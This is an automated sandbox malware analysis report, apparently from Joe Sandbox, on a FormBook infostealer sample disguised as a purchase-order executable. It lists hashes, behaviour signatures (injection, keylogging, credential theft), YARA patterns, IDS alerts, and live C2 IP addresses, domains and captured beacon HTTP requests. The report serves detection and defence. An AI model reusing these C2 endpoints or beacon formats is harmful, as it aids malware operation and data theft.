
Windows Analysis Report
PO# Q919240.exe

Overview

General Information

Sample name: PO# Q919240.exe
Analysis ID: 1515409
MD5: 1cdbbc595757ea5f6e9393d622d66e10
SHA1: 23eee5c85533ade7e463f0ad52bb044292aa4b43
SHA256: 1872f51b5d3913490f3936ab41a7388212d4c10e389eb211bc448029380891ce
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different from the original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PO# Q919240.exe (PID: 5976 cmdline: "C:\Users\user\Desktop\PO# Q919240.exe" MD5: 1CDBBC595757EA5F6E9393D622D66E10)
    • svchost.exe (PID: 2704 cmdline: "C:\Users\user\Desktop\PO# Q919240.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • fALrZoEgBHis.exe (PID: 3604 cmdline: "C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 2892 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • fALrZoEgBHis.exe (PID: 5424 cmdline: "C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6724 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bd00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2df63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16192:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ed63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16f92:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\PO# Q919240.exe", CommandLine: "C:\Users\user\Desktop\PO# Q919240.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO# Q919240.exe", ParentImage: C:\Users\user\Desktop\PO# Q919240.exe, ParentProcessId: 5976, ParentProcessName: PO# Q919240.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO# Q919240.exe", ProcessId: 2704, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\PO# Q919240.exe", CommandLine: "C:\Users\user\Desktop\PO# Q919240.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO# Q919240.exe", ParentImage: C:\Users\user\Desktop\PO# Q919240.exe, ParentProcessId: 5976, ParentProcessName: PO# Q919240.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO# Q919240.exe", ProcessId: 2704, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-22T17:35:18.761396+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49709 | 148.72.152.174 | 80 | TCP
2024-09-22T17:35:42.174257+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49714 | 3.33.130.190 | 80 | TCP
2024-09-22T17:35:56.120065+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49718 | 172.191.244.62 | 80 | TCP
2024-09-22T17:36:10.054859+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49722 | 172.96.191.39 | 80 | TCP
2024-09-22T17:36:23.407666+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49726 | 217.70.184.50 | 80 | TCP
2024-09-22T17:36:37.347253+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49730 | 63.250.47.40 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-22T17:35:18.761396+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49709 | 148.72.152.174 | 80 | TCP
2024-09-22T17:35:42.174257+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49714 | 3.33.130.190 | 80 | TCP
2024-09-22T17:35:56.120065+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49718 | 172.191.244.62 | 80 | TCP
2024-09-22T17:36:10.054859+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49722 | 172.96.191.39 | 80 | TCP
2024-09-22T17:36:23.407666+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49726 | 217.70.184.50 | 80 | TCP
2024-09-22T17:36:37.347253+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.7 | 49730 | 63.250.47.40 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-22T17:35:34.564690+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49711 | 3.33.130.190 | 80 | TCP
2024-09-22T17:35:37.085303+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49712 | 3.33.130.190 | 80 | TCP
2024-09-22T17:35:39.575322+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49713 | 3.33.130.190 | 80 | TCP
2024-09-22T17:35:48.517116+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49715 | 172.191.244.62 | 80 | TCP
2024-09-22T17:35:50.996842+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49716 | 172.191.244.62 | 80 | TCP
2024-09-22T17:35:53.575926+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49717 | 172.191.244.62 | 80 | TCP
2024-09-22T17:36:02.435973+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49719 | 172.96.191.39 | 80 | TCP
2024-09-22T17:36:04.991771+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49720 | 172.96.191.39 | 80 | TCP
2024-09-22T17:36:07.507518+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49721 | 172.96.191.39 | 80 | TCP
2024-09-22T17:36:15.772021+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49723 | 217.70.184.50 | 80 | TCP
2024-09-22T17:36:18.306948+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49724 | 217.70.184.50 | 80 | TCP
2024-09-22T17:36:20.860552+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49725 | 217.70.184.50 | 80 | TCP
2024-09-22T17:36:29.259482+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49727 | 63.250.47.40 | 80 | TCP
2024-09-22T17:36:31.833562+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49728 | 63.250.47.40 | 80 | TCP
2024-09-22T17:36:34.393042+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49729 | 63.250.47.40 | 80 | TCP


AV Detection

Source: PO# Q919240.exe | Avira: detected
Source: http://www.omexai.info/7xi5/ | Avira URL Cloud: Label: malware
Source: https://www.elsupertodo.net/2jit/?OXVx9=WNjT&H0QP6=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryY | Avira URL Cloud: Label: malware
Source: http://www.omexai.info/7xi5/?H0QP6=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&OXVx9=WNjT | Avira URL Cloud: Label: malware
Source: http://www.tekilla.wtf/fpzw/ | Avira URL Cloud: Label: malware
Source: http://www.tekilla.wtf/fpzw/?H0QP6=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU&OXVx9=WNjT | Avira URL Cloud: Label: malware
Source: http://www.omexai.info/7xi5/ | Virustotal: Detection: 6%
Source: http://www.tekilla.wtf/fpzw/ | Virustotal: Detection: 6%
Source: PO# Q919240.exe | ReversingLabs: Detection: 71%
Source: PO# Q919240.exe | Virustotal: Detection: 73%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PO# Q919240.exe | Joe Sandbox ML: detected
Source: PO# Q919240.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fALrZoEgBHis.exe, 00000003.00000000.1576220938.00000000005EE000.00000002.00000001.01000000.00000004.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2705527345.00000000005EE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO# Q919240.exe, 00000000.00000003.1456302467.0000000004790000.00000004.00001000.00020000.00000000.sdmp, PO# Q919240.exe, 00000000.00000003.1456163573.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1558405527.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1556481442.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1665886213.00000000036E0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003A40000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003BDE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1668169113.0000000003896000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO# Q919240.exe, 00000000.00000003.1456302467.0000000004790000.00000004.00001000.00020000.00000000.sdmp, PO# Q919240.exe, 00000000.00000003.1456163573.00000000045F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1558405527.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1556481442.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1666097981.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000005.00000003.1665886213.00000000036E0000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003A40000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2709007142.0000000003BDE000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1668169113.0000000003896000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.1633897813.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1665876167.0000000003200000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000003.1606402331.000000000068B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000005.00000002.2710234659.000000000406C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2706051266.00000000035EE000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000002F9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2063649415.000000003BBCC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000005.00000002.2710234659.000000000406C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2706051266.00000000035EE000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000002F9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2063649415.000000003BBCC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.1633897813.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1665876167.0000000003200000.00000004.00000020.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000003.00000003.1606402331.000000000068B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 5_2_0330C2C0 FindFirstFileW,FindNextFileW,FindClose,5_2_0330C2C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then xor eax, eax | 5_2_032F9B90
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then pop edi | 5_2_03312399
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4x nop then mov ebx, 00000004h | 5_2_039304DE

Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49713 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49719 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49712 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49725 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49720 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49715 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49714 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49714 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49722 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49717 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49722 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49724 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49727 -> 63.250.47.40:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49709 -> 148.72.152.174:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49726 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49709 -> 148.72.152.174:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49726 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49728 -> 63.250.47.40:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49721 -> 172.96.191.39:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49723 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49730 -> 63.250.47.40:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49730 -> 63.250.47.40:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49716 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49711 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49718 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49718 -> 172.191.244.62:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49729 -> 63.250.47.40:80
Source: Joe Sandbox View | IP Address: 172.191.244.62
Source: Joe Sandbox View | IP Address: 63.250.47.40
Source: Joe Sandbox View | IP Address: 172.96.191.39
Source: Joe Sandbox View | ASN Name: ATT-INTERNET4US
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View | ASN Name: LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG
Source: Joe Sandbox View | ASN Name: GANDI-ASDomainnameregistrar-httpwwwgandinetFR
Source: Joe Sandbox View | ASN Name: AS-30083-GO-DADDY-COM-LLCUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 8 times)
Source: C:\Users\user\Desktop\PO# Q919240.exe | Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
Source: global traffic | HTTP traffic detected:
    GET /2jit/?OXVx9=WNjT&H0QP6=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1SqQDUweCIsEqLd/p7kKGUYrPSxxpvnmiXhdiVPK1m148tdjfTEW52DcI HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.elsupertodo.net
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected:
    GET /7xi5/?H0QP6=ixI46zwDNWOoK0d+RZ8JuaZDY//QVGo+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELAxrcBTztpjqBrZhwiA0EH/lToqzuS48eXmZJHBx0mPNMD2Zb1NeSBUqu&OXVx9=WNjT HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.omexai.info
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected:
    GET /fpzw/?H0QP6=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx67RM9UV6q1id4S41bRGRNPU7sZmTTXii7ECS+ocOWyNUrGm29a8UkIU&OXVx9=WNjT HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.tekilla.wtf
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected:
    GET /3qit/?H0QP6=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYQxg90ohUPLnuDBmcV/JKR3qQ6hCHukB1vPlSHURbGTm5jGBVUo3vRYYo&OXVx9=WNjT HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US,en;q=0.9
    Host: www.bola88site.one
    Connection: close
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Source: global traffic | HTTP traffic detected:
